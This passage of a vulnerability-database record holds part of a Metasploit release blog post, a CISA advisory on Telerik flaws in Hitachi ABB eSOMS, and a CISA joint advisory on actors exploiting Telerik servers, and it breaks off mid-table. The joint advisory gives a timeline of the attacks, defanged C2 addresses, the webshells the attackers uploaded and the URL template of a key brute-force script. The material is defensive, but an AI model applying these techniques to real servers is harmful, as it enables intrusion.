[CVE-2020-16952](<https://attackerkb.com/topics/4yGC4tLK2x/cve-2020-16952-microsoft-sharepoint-remote-code-execution-vulnerabilities?referrer=wrapup>)\n * [Telerik UI ASP.NET AJAX RadAsyncUpload Deserialization](<https://github.com/rapid7/metasploit-framework/pull/14229>) by [Alvaro Mu\u00f1oz](<https://github.com/pwntester>), [Caleb Gross](<https://github.com/noperator>), [Markus Wulftange](<https://github.com/mwulftange>), [Oleksandr Mirosh](<https://twitter.com/olekmirosh>), [Paul Taylor](<https://github.com/bao7uo>), [Spencer McIntyre](<https://github.com/zeroSteiner>), and [straightblast](<https://github.com/straightblast>), which exploits [CVE-2019-18935](<https://attackerkb.com/topics/ZA24eUeDg5/cve-2019-18935?referrer=wrapup>)\n * [Microsoft Windows Uninitialized Variable Local Privilege Elevation](<https://github.com/rapid7/metasploit-framework/pull/13817>) by [piotrflorczyk](<https://github.com/piotrflorczyk>), [timwr](<https://github.com/timwr>), and [unamer](<https://github.com/unamer>), which exploits [CVE-2019-1458](<https://attackerkb.com/topics/2i67dR7P4e/cve-2019-1458?referrer=wrapup>)\n\n## Enhancements and features\n\n * [Add version check to exchange_ecp_dlp_policy](<https://github.com/rapid7/metasploit-framework/pull/14289>) by [wvu](<https://github.com/wvu-r7>) adds extended version checks for SharePoint and Exchange servers as used by the exploit modules for [CVE-2020-16875](<https://attackerkb.com/topics/Y2azzfAbid/cve-2020-16875?referrer=wrapup>) and [CVE-2020-16952](<https://attackerkb.com/topics/4yGC4tLK2x/cve-2020-16952-microsoft-sharepoint-remote-code-execution-vulnerabilities?referrer=wrapup>).\n * [Parameterize args to popen3()](<https://github.com/rapid7/metasploit-framework/pull/14288>) by [Justin Steven](<https://github.com/justinsteven>) improves commands executed during `apk` generation commands to be more explicit with options.\n * [More improved doc and syntax](<https://github.com/rapid7/metasploit-framework/pull/14258>) by [h00die](<https://github.com/h00die>) adds documentation and code quality changes for multiple modules. As always docs improvement are greatly appreciated!\n * [Add tab completion for `run` command](<https://github.com/rapid7/metasploit-framework/pull/14240>) by [cgranleese-r7](<https://github.com/cgranleese-r7>) adds tab completion for specifying inline options when using the `run` command. For example, within Metasploit's console typing `run` and then hitting the tab key twice will now show all available option names. Incomplete option names and values can also be also suggested, for example `run LHOST=` and then hitting the tab key twice will show all available LHOST values.\n * [CVE-2019-1458 chrome sandbox escape](<https://github.com/rapid7/metasploit-framework/pull/13817>) by [timwr](<https://github.com/timwr>) adds support for exploiting [CVE-2019-1458](<https://attackerkb.com/topics/2i67dR7P4e/cve-2019-1458?referrer=wrapup>), aka WizardOpium, as both a standalone LPE module, and as a sandbox escape option for the `exploit/multi/browser/chrome_object_create.rb` module that exploits [CVE-2018-17463](<https://attackerkb.com/topics/fgJVNLkV6f/cve-2018-17463?referrer=wrapup>) in Chrome, thereby allowing users to both elevate their privileges on affected versions of Windows, as well as potentially execute a full end to end attack chain to go from a malicious web page to SYSTEM on systems running vulnerable versions of Chrome and Windows.\n * [Parameterize args to popen3()](<https://github.com/rapid7/metasploit-framework/pull/14288>) by [Justin Steven](<https://github.com/justinsteven>) improves commands executed during `apk` generation commands to be more explicit with options.\n * [More improved doc and syntax](<https://github.com/rapid7/metasploit-framework/pull/14258>) by [h00die](<https://github.com/h00die>) adds documentation and code quality changes for multiple modules. As always, docs improvements are greatly appreciated!\n\n## Bugs fixed\n\n * [MS17-010 improvements for SMB1 clients](<https://github.com/rapid7/metasploit-framework/pull/14290>) by [Spencer McIntyre](<https://github.com/zeroSteiner>) fixes an issue with the exploit/windows/smb/ms17_010_eternalblue module that was preventing sessions from being obtained successfully.\n * [Fix missing TLV migration from strings -> ints](<https://github.com/rapid7/metasploit-payloads/pull/441>) by [Justin Steven](<https://github.com/justinsteven>) converts a missed TLV conversion for COMMAND_ID_CORE_CHANNEL_CLOSE for PHP payloads.\n * [Meterpreter endless loop](<https://github.com/rapid7/metasploit-payloads/pull/439>) by [vixfwis](<https://github.com/vixfwis>), ensured that Meterpreter can properly handle SOCKET_ERROR on recv.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:\n\n * [Pull Requests 6.0.11...6.0.12](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222020-10-13T14%3A57%3A09-05%3A00..2020-10-22T09%3A00%3A02-05%3A00%22>)\n * [Full diff 6.0.11...6.0.12](<https://github.com/rapid7/metasploit-framework/compare/6.0.11...6.0.12>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2020-10-23T18:56:55", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-17463", "CVE-2019-1458", "CVE-2019-18935", "CVE-2020-16875", "CVE-2020-16952"], "modified": "2020-10-23T18:56:55", "id": "RAPID7BLOG:E8EB68630D38C60B7DE4AF696474210D", "href": "https://blog.rapid7.com/2020/10/23/metasploit-wrap-up-84/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "ics": [{"lastseen": "2023-09-23T07:17:06", "description": "## 1\\. EXECUTIVE SUMMARY\n\n * **CVSS v3 9.8**\n * **ATTENTION: **Exploitable remotely/low skill level to exploit\n * **Vendor:** Hitachi ABB Power Grids\n * **Equipment: **eSOMS Telerik\n * **Vulnerabilities:** Path Traversal, Deserialization of Untrusted Data, Improper Input Validation, Inadequate Encryption Strength, Insufficiently Protected Credentials, Path Traversal\n\n## 2\\. RISK EVALUATION\n\nSuccessful exploitation of these vulnerabilities could allow an attacker to upload malicious files to the server, discover sensitive information, or execute arbitrary code.\n\n## 3\\. TECHNICAL DETAILS\n\n### 3.1 AFFECTED PRODUCTS\n\nHitachi ABB Power Grids reports the vulnerabilities affect the following eSOMS products: \n\n * eSOMS, all versions prior to 6.3 using a version of Telerik software \n\n### 3.2 VULNERABILITY OVERVIEW\n\n#### 3.2.1 [PATH TRAVERSAL CWE-22](<https://cwe.mitre.org/data/definitions/22.html>)\n\nPath traversal in RadChart in Telerik UI for ASP.NET AJAX allows a remote attacker to read and delete an image with extension .BMP, .EXIF, .GIF, .ICON, .JPEG, .PNG, .TIFF, or .WMF on the server through a specially crafted request. \n\n[CVE-2019-19790](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-19790>) has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>)).\n\n#### 3.2.2 [DESERIALIZATION OF UNTRUSTED DATA CWE-502](<https://cwe.mitre.org/data/definitions/502.html>)\n\nProgress Telerik UI for ASP.NET AJAX through 2019.3.1023 contains a .NET deserialization vulnerability in the RadAsyncUpload function. This is exploitable when the encryption keys are known. \n\n[CVE-2019-18935](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-18935>) has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>)).\n\n#### 3.2.3 [IMPROPER INPUT VALIDATION CWE-20](<https://cwe.mitre.org/data/definitions/20.html>)\n\nProgress Telerik UI for ASP.NET AJAX before R2 2017 SP2 does not properly restrict user input to RadAsyncUpload, which allows remote attackers to perform arbitrary file uploads or execute arbitrary code. \n\n[CVE-2017-11357](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11357>) has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>)).\n\n#### 3.2.4 [INADEQUATE ENCRYPTION STRENGTH CWE-326](<https://cwe.mitre.org/data/definitions/326.html>)\n\nTelerik.Web.UI in Progress Telerik UI for ASP.NET AJAX before R1 2017 and R2 before R2 2017 SP2 uses weak RadAsyncUpload encryption, which allows remote attackers to perform arbitrary file uploads or execute arbitrary code. \n\n[CVE-2017-11317](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11317>) has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>)).\n\n#### 3.2.5 [INSUFFICIENTLY PROTECTED CREDENTIALS CWE-522](<https://cwe.mitre.org/data/definitions/522.html>)\n\nTelerik.Web.UI.dll in Progress Telerik UI for ASP.NET AJAX before R2 2017 SP1 and Sitefinity before 10.0.6412.0 does not properly protect Telerik.Web.UI.DialogParametersEncryptionKey or the MachineKey, which makes it easier for remote attackers to defeat cryptographic protection mechanisms, leading to a MachineKey leak, arbitrary file uploads or downloads, XSS, or ASP.NET ViewState compromise. \n\n[CVE-2017-9248](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-9248>) has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>)).\n\n#### 3.2.6 [PATH TRAVERSAL CWE-22](<https://cwe.mitre.org/data/definitions/22.html>)\n\nAbsolute path traversal vulnerability in the RadAsyncUpload control in the RadControls in Telerik UI for ASP.NET AJAX before Q3 2012 SP2 allows remote attackers to write to arbitrary files, and consequently execute arbitrary code, via a full pathname in the UploadID metadata value. \n\n[CVE-2014-2217](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2217>) has been assigned to this vulnerability. A CVSS v3 base score of 7.5 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N>)).\n\n#### 3.2.7 [PATH TRAVERSAL CWE-22](<https://cwe.mitre.org/data/definitions/22.html>)\n\nCross-site scripting (XSS) vulnerability in Telerik UI for ASP.NET AJAX RadEditor control 2014.1.403.35, 2009.3.1208.20, and other versions allows remote attackers to inject arbitrary web script or HTML via CSS expressions in style attributes. \n\n[CVE-2014-4958](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4958>) has been assigned to this vulnerability. A CVSS v3 base score of 4.3 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N>)).\n\n### 3.3 BACKGROUND\n\n * **CRITICAL INFRASTRUCTURE SECTORS:** Energy\n * **COUNTRIES/AREAS DEPLOYED: **Worldwide\n * **COMPANY HEADQUARTERS LOCATION: **Switzerland\n\n### 3.4 RESEARCHER\n\nHitachi ABB Power Grids reported these vulnerabilities to CISA.\n\n## 4\\. MITIGATIONS\n\nHitachi ABB Power Grids has published an [advisory for eSOMS Telerik](<https://search.abb.com/library/Download.aspx?DocumentID=9AKK107991A8943&LanguageCode=en&DocumentPartId=&Action=Launch>) and advises users to update to eSOMS Version 6.3 as soon as possible. \n\nFor additional information and support, contact a product provider or Hitachi ABB Power Grids service organization. For contact information, visit [Hitachi ABB Power Grids contact-centers](<https://www.hitachiabb-powergrids.com/contact-us/>).\n\nRecommended security practices and firewall configurations can help protect a process control network from attacks that originate from outside the network. Such practices include ensuring applications and servers are physically protected from direct access by unauthorized personnel, have no direct connections to the Internet, are separated from other networks by means of a firewall system that has a minimal number of ports exposed, and others that must be evaluated case by case. Sensitive application servers should not be used for Internet surfing, instant messaging, or receiving e-mails. Portable computers and removable storage media should be carefully scanned for viruses before they are connected to a control system.\n\nCISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\n\nCISA also provides a section for [control systems security recommended practices](<https://us-cert.cisa.gov/ics/recommended-practices>) on the ICS webpage on [us-cert.cisa.gov](<https://us-cert.cisa.gov/ics>). Several recommended practices are available for reading and download, including [Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies](<https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf>).\n\nAdditional mitigation guidance and recommended practices are publicly available on the [ICS webpage on us-cert.cisa.gov](<https://us-cert.cisa.gov/ics>) in the Technical Information Paper, [ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies](<https://us-cert.cisa.gov/ics/tips/ICS-TIP-12-146-01B>).\n\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to CISA for tracking and correlation against other incidents.\n\nNo known public exploits specifically target these vulnerabilities.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-18T12:00:00", "type": "ics", "title": "Hitachi ABB Power Grids eSOMS Telerik", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2217", "CVE-2014-4958", "CVE-2017-11317", "CVE-2017-11357", "CVE-2017-9248", "CVE-2019-18935", "CVE-2019-19790"], "modified": "2021-03-18T12:00:00", "id": "ICSA-21-077-03", "href": "https://www.cisa.gov/news-events/ics-advisories/icsa-21-077-03", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-07T17:26:56", "description": "#### **SUMMARY**\n\nFrom November 2022 through early January 2023, the Cybersecurity and Infrastructure Security Agency (CISA) and authoring organizations identified the presence of indicators of compromise (IOCs) at a federal civilian executive branch (FCEB) agency. Analysts determined that multiple cyber threat actors, including an advanced persistent threat (APT) actor, were able to exploit a .NET deserialization vulnerability ([CVE-2019-18935](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935> \"CVE-2019-18935\" )) in Progress Telerik user interface (UI) for ASP.NET AJAX, located in the agency\u2019s Microsoft Internet Information Services (IIS) web server. Successful exploitation of this vulnerability allows for remote code execution. According to Progress Software, Telerik UI for ASP.NET AJAX builds before R1 2020 (2020.1.114) are vulnerable to this exploit.[[1](<https://docs.telerik.com/devtools/aspnet-ajax/knowledge-base/common-allows-javascriptserializer-deserialization> \"Allows JavaScriptSerializer Deserialization\" )]\n\n**_Update June 15, 2023:_**\n\nAs of April 2023, forensic analysis conducted at an additional FCEB agency identified exploitation of CVE-2017-9248 in the agency\u2019s IIS server by unattributed APT actors\u2014specifically within the Telerik UI for ASP.NET AJAX DialogHandler component. This specific analysis is provided as context for existing vulnerabilities within Telerik UI for ASP.NET AJAX.\n\n**_Update End_**\n\n**Actions to take today to mitigate malicious cyber activity:**\n\n * Implement a patch management solution to ensure compliance with the latest security patches.\n * Validate output from patch management and vulnerability scanning against running services to check for discrepancies and account for all services.\n * Limit service accounts to the minimum permissions necessary to run services.\n\nCISA, the Federal Bureau of Investigation (FBI), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint Cybersecurity Advisory (CSA) to provide IT infrastructure defenders with tactics, techniques, and procedures (TTPs), IOCs, and methods to detect and protect against similar exploitation.\n\nDownload the PDF version of this report:\n\nThreat Actors Exploit Progress Telerik Vulnerabilities in Multiple U.S. Government IIS Servers (PDF, 661.68 KB )\n\nFor a downloadable copy of IOCs, see below or the [JSON](<https://www.cisa.gov/sites/default/files/STIX/AA23-074A_Threat_Actors_Exploit_Progress_Telerik_Vulnerabilities_in_Multiple_US_Government_IIS_Servers.stix.json>) file.\n\nAA23-074A STIX XML (XML, 30.96 KB )\n\nFor copies of the Malware Analysis Reports (MARs) accompanying this CSA:\n\n * [MAR-10413062-1.v1 CVE-2019-18935 Exploitation in U.S. Government IIS Server](<https://www.cisa.gov/news-events/analysis-reports/ar23-074a>)\n * **_Update June 15, 2023: _**_[MAR-10443863-1.v1 CVE-2017-9248 Exploitation in U.S. Government IIS Server](<https://www.cisa.gov/news-events/analysis-reports/ar23-166a>) _**_Update End_**\n\n#### **TECHNICAL DETAILS**\n\n**Note:** This advisory uses the [MITRE ATT&CK\u00ae for Enterprise](<https://attack.mitre.org/versions/v12/matrices/enterprise/> \"Enterprise Matrix\" ) framework, version 12. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors\u2019 activity mapped to MITRE ATT&CK tactics and techniques with corresponding detection and mitigation recommendations.\n\n##### **Overview**\n\nCISA and authoring organizations assess that, beginning as late as November 2022, threat actors successfully exploited a .NET deserialization vulnerability (CVE-2019-18935) in an instance of Telerik UI for ASP.NET AJAX Q2 2013 SP1 (version 2013.2.717) running on an FCEB agency\u2019s Microsoft IIS server. This exploit, which results in interactive access with the web server, enabled the threat actors to successfully execute remote code on the vulnerable web server. Though the agency\u2019s vulnerability scanner had the appropriate plugin for CVE-2019-18935, it failed to detect the vulnerability due to the Telerik UI software being installed in a file path it does not typically scan. This may be the case for many software installations, as file paths widely vary depending on the organization and installation method.\n\nIn addition to CVE-2019-18935, this version (2013.2.717) of Telerik UI for ASP.NET AJAX contains the following known vulnerabilities: [CVE-2017-11357](<https://nvd.nist.gov/vuln/detail/CVE-2017-11357> \"CVE-2017-11357\" ), [CVE-2017-11317](<https://nvd.nist.gov/vuln/detail/CVE-2017-11317> \"CVE-2017-11317\" ), and [CVE-2017-9248](<https://nvd.nist.gov/vuln/detail/CVE-2017-9248> \"CVE-2017-9248\" ).\n\n**_Update June 15, 2023:_**\n\nForensic analysis conducted at an additional FCEB agency identified exploitation of CVE-2017-9248 in the agency\u2019s IIS server by unattributed APT actors\u2014specifically within the Telerik UI for ASP.NET AJAX DialogHandler component. Activity identified at this agency is separate from the CVE-2019-18935 exploitation listed above and throughout this CSA. Analysis is provided as context for existing vulnerabilities within Telerik UI for ASP.NET AJAX.\n\nAnalysis concluded the agency\u2019s IIS server operated an outdated version of Telerik UI for ASP.NET AJAX (2009.3.1.1208.35), which was identified via the Telerik.Web.UI.dll file located in the server's .NET Framework directory. It should be noted that Telerik UI for ASP.NET AJAX versions prior to 2017.2.621 are considered cryptographically weak; this weakness is in the RadAsyncUpload function that uses encryption to secure uploaded files. Proof-of-concept code has been publicly available since January 2018.[[2](<https://www.exploit-db.com/exploits/43873>)]\n\n**Note:** The APT actors listed in this June 2023 update were observed leveraging virtual private servers (VPS) to route traffic to their target [[T1583.003](<https://attack.mitre.org/versions/v12/techniques/T1583/003/>)]. Due to the constant change incurred through use of different VPS infrastructures, the below timeline lists threat actor-controlled IPs that are likely only relevant for hunting during the specified narrow timeline of activity and are not recommended for blocking.\n\n_Table 1: Timeline of Unattributed APT Actor Activity (CVE-2017-9248)_\n\n**Date**\n\n| \n\n**Event**\n\n| \n\n**Description** \n \n---|---|--- \n \n04/14/2023\n\n| \n\nBrute force attempts via dp_crypto.py\n\n| \n\nAPT actors used dp_crypto.py, a Python-based cryptographic script, to initiate and successfully execute [[T1059.006](<https://attack.mitre.org/versions/v12/techniques/T1059/006/>)] a brute force attack against the encryption key used by the Telerik UI for ASP.NET AJAX DialogHandler. This activity was associated with the malicious IP 20.121.51[.]51.\n\n**Note:** Each version of the DialogHandler has a distinct URL to reference and interact with, as well as unique security configurations. APT actors created URLs to target these individual versions and increase their likelihood of successfully exploiting any existing vulnerabilities.\n\nIn this instance, dp_crypto.py targeted versions of the DialogHandler and exploited version-specific vulnerabilities. Based on available proof-of-concept code, the target URL format that dp_crypto.py uses is:\n\n<url_path>?DialogName=DocumentManager&renderMode=2&Skin=Default&Title=Document%20Manager&dpptn=&isRtl=false&dp=<dp_encrypted> \n \n04/14/2023\n\n| \n\nSuccessful IIS server exploitation\n\n| \n\nAPT actors exploited CVE-2017-9248 in the agency\u2019s IIS server [[T1190](<https://attack.mitre.org/versions/v12/techniques/T1190/>)]. \n \n04/14/2023\n\n| \n\nSuccessful access of Document Manager\n\n| \n\nAPT actors gained unauthorized access to the Document Manager component within Telerik UI for ASP.NET AJAX.\n\n**Note: **Document Manager provides an interface for users to manage documents, such as uploading, downloading, editing, deleting, or organizing files. APT actors manipulated the Document Manager to upload malicious scripts, download and delete sensitive files, and make unauthorized modifications [[T1105](<https://attack.mitre.org/versions/v12/techniques/T1105/>)]. In more sophisticated attacks, cyber threat actors may use this access as means for lateral movement into an organization\u2019s network. \n \n04/14/2023\n\n| \n\nDone.html uploaded to IIS server\n\n| \n\nAPT actors uploaded Done.html to the IIS server as means for confirming successful CVE-2017-9248 exploitation and file upload capabilities. **Note: **This file was not identified as malicious. \n \n04/14/2023\n\n| \n\nsd.php and osker.aspx webshells uploaded to IIS server\n\n| \n\nAPT actors uploaded malicious webshells [[T1505.003](<https://attack.mitre.org/versions/v12/techniques/T1505/003/>)] (sd.php, osker.aspx) for backdoor access and remote control. osker.aspx was accessed via malicious IP 207.244.71[.]81 until 04/15/2023, likely to maintain persistence or conduct further operations that were not identified during analysis. \n \n04/14/2023\n\n| \n\nApp_Web_jl37rjxu.dll created on IIS server\n\n| \n\nAPT actors created App_Web_jl37rjxu.dll on the IIS server, which indicated code was successfully compiling or running. \n \n04/15/2023\n\n| \n\nfassdfsdf.html uploaded to IIS server\n\n| \n\nAPT actors uploaded fassdfsdf.html to the IIS server. This was likely used as a test file to validate successful file transfer. \n \n04/17/2023\n\n| \n\nosker.aspx webshell accessed from different IP\n\n| \n\nAPT actors accessed the osker.aspx webshell via malicious IP 162.210.194[.]10. \n \nCISA and authoring organizations were unable to identify privilege escalation, lateral movement, or data exfiltration. However, the presence of webshells and file uploads indicated APT actors maintained access and had the potential to conduct additional malicious activity.\n\nFor more information on the identified malicious files from Table 1, see MAR-10443863-1.v1 CVE-2017-9248 Exploitation in U.S. Government IIS Server.\n\n**_Update End_**\n\nAnalysis suggests that cyber threat actors exploited CVE-2019-18935 in conjunction with either CVE-2017-11357 or CVE-2017-11317. Australian Cyber Security Centre (ACSC) Advisory 2020-004 assesses that exploitation of CVE-2019-18935 is only possible with knowledge of Telerik RadAsyncUpload encryption keys.[[3](<https://www.cyber.gov.au/acsc/view-all-content/advisories/advisory-2020-004-remote-code-execution-vulnerability-being-actively-exploited-vulnerable-versions-telerik-ui-sophisticated-actors>)] Threat actors can obtain these keys through either prior knowledge or exploitation of vulnerabilities\u2014CVE-2017-11357 or CVE-2017-11317\u2014present in older, unpatched versions of Telerik released between 2007 and 2017. Forensic evidence is not available to definitively confirm exploitation of either CVE-2017-11357 or CVE-2017-11317.\n\n##### **Threat Actor Activity**\n\nCISA and authoring organizations observed multiple cyber threat actors, including an APT actor\u2014hereafter referred to as Threat Actor 1 (TA1)\u2014and known cybercriminal actor XE Group\u2014hereafter referred to as Threat Actor 2 (TA2)\u2014conducting reconnaissance and scanning activities [[T1595.002](<https://attack.mitre.org/versions/v12/techniques/T1595/002/> \"Active Scanning: Vulnerability Scanning\" )] that correlate to the successful exploitation of CVE-2019-18935 in the agency\u2019s IIS server running Telerik UI for ASP.NET AJAX [[T1190](<https://attack.mitre.org/versions/v12/techniques/T1190/> \"Exploit Public-Facing Application\" )].\n\nWhen exploiting the vulnerability, the threat actors uploaded malicious dynamic-link library (DLL) files (some masqueraded as portable network graphics [PNG] files) [[T1105](<https://attack.mitre.org/versions/v12/techniques/T1105/> \"Ingress Tool Transfer\" )] to the `C:\\Windows\\Temp\\` directory. The malicious files were then executed from the `C:\\Windows\\Temp\\` directory via the `w3wp.exe` process\u2014a legitimate process that runs on IIS servers. This process is routine for handling requests sent to web servers and delivering content. The review of antivirus logs identified that some DLL files were created [[T1055.001](<https://attack.mitre.org/versions/v12/techniques/T1055/001/> \"Process Injection: Dynamic-link Library Injection\" )] and detected as early as August 2021.\n\nCISA and authoring organizations confirmed that some malicious files dropped on the IIS server are consistent with a previously reported file naming convention that threat actors commonly use when exploiting CVE-2019-18935.[[4](<https://bishopfox.com/blog/cve-2019-18935-remote-code-execution-in-telerik-ui>)] The threat actors name the files in the Unix Epoch time format and use the date and time as recorded on the target system. The file naming convention follows the pattern `[10 digits].[7 digits].dll` (e.g., a file created on October 31, 2022, could be `1667203023.5321205.dll`).\n\nThe names of some of the PNG files were misleading. For example, file `1596835329.5015914.png`, which decodes to August 7, 2020, 21:22:09 UTC, first appeared on October 13, 2022, but the file system shows a creation date of August 7, 2020. The uncorrelated Unix Epoch time format may indicate that the threat actors used the timestomping [[T1070.006](<https://attack.mitre.org/versions/v12/techniques/T1070/006/> \"Indicator Removal: Timestomp\" )] technique. This file naming convention is a primary IOC used by the threat actors.\n\nIn many cases, malicious artifacts were not available for analysis because the threat actors\u2019 malware\u2014that looks for and removes files with the .dll file extension\u2014removed files [[T1070.004](<https://attack.mitre.org/versions/v12/techniques/T1070/004/> \"Indicator Removal: File Deletion\" )] from the `C:\\Windows\\Temp\\` directory. Through full packet data capture analysis and reverse engineering of malicious DLL files, no indications of additional malicious activity or sub-processes were found executed by the `w3wp.exe` process. CISA observed error messages being sent to the threat actors\u2019 command and control (C2) server when permission restraints prevented the service account from executing the malicious DLLs and writing new files.\n\nNetwork activity analysis was consistent with the artifacts provided for review. Analysts did not observe evidence of privilege escalation or lateral movement.\n\n##### Threat Actor 1\n\nCISA and authoring organizations observed TA1 exploiting CVE-2019-18935 for system enumeration beginning in August 2022. The vulnerability allows a threat actor to upload malicious DLLs on a target system and execute them by abusing a legitimate process, e.g., the `w3wp.exe` process. In this instance, TA1 was able to upload malicious DLL files to the C:\\Windows\\Temp\\ directory and then achieve remote code execution, executing the DLL files via the w3wp.exe process.\n\nAt least nine DLL files used for discovery [[TA0007](<https://attack.mitre.org/versions/v12/tactics/TA0007/> \"Discovery\" )], C2 [[TA0011](<https://attack.mitre.org/versions/v12/tactics/TA0011/> \"Command and Control\" )], and defense evasion [[TA0005](<https://attack.mitre.org/versions/v12/tactics/TA0005/> \"Defense Evasion\" )]. All of the analyzed samples have network parameters, including host name, domain name, Domain Name System (DNS) server Internet Protocol (IP) address and machine name, Network Basic Input/Output System (NetBIOS) ID, adapter information, IP address, subnet, gateway IP, and Dynamic Host Configuration Protocol (DHCP) server [[T1016](<https://attack.mitre.org/versions/v12/techniques/T1016/> \"System Network Configuration Discovery\" )]. All analyzed samples communicate this collected data to a C2 server at IP address 1`37.184.130[.]162` or `45.77.212[.]12`. The C2 traffic to these IP addresses uses a non-application layer protocol [[T1095](<https://attack.mitre.org/versions/v12/techniques/T1095/> \"Non-Application Layer Protocol\" )] by leveraging Transmission Control Protocol (TCP) clear text (i.e., unencrypted) over port 443. Analysis also identified that:\n\n * Some of the analyzed samples can load additional libraries; enumerate the system, processes, files, directories [[T1083](<https://attack.mitre.org/versions/v12/techniques/T1083/> \"File and Directory Discovery\" )]; and write files.\n * Other analyzed samples can delete DLL files ending with the `.dll` extension in the `C:\\Windows\\Temp\\` directory on the server. TA1 may use this capability to hide additional malicious activity on the network.\n\nCISA, in coordination with the authoring organizations, identified and observed the following threat actor IPs and timestamps associated with this activity:\n\n_Table 2: Observed TA1 IPs and Timestamps_\n\n**IP Address**\n\n| \n\n**First Identified**\n\n| \n\n**Last Identified** \n \n---|---|--- \n \n137.184.130[.]162\n\n| \n\n09/26/2022\n\n| \n\n10/08/2022 \n \n45.77.212[.]12\n\n| \n\n10/07/2022\n\n| \n\n11/25/2022 \n \n104.225.129[.]102\n\n| \n\n10/10/2022\n\n| \n\n11/16/2022 \n \n149.28.85[.]24\n\n| \n\n10/12/2022\n\n| \n\n10/17/2022 \n \n185.186.245[.]72\n\n| \n\n10/18/2022\n\n| \n\n10/18/2022 \n \n193.8.172[.]113\n\n| \n\n09/25/2022\n\n| \n\n09/25/2022 \n \n193.8.172[.]13\n\n| \n\n09/25/2022\n\n| \n\n10/17/2022 \n \n216.120.201[.]12\n\n| \n\n10/13/2022\n\n| \n\n11/10/2022 \n \n5.34.178[.]246\n\n| \n\n09/25/2022\n\n| \n\n09/25/2022 \n \n79.133.124[.]242\n\n| \n\n09/25/2022\n\n| \n\n09/25/2022 \n \n92.38.169[.]193\n\n| \n\n09/27/2022\n\n| \n\n10/08/2022 \n \n92.38.176[.]109\n\n| \n\n09/12/2022\n\n| 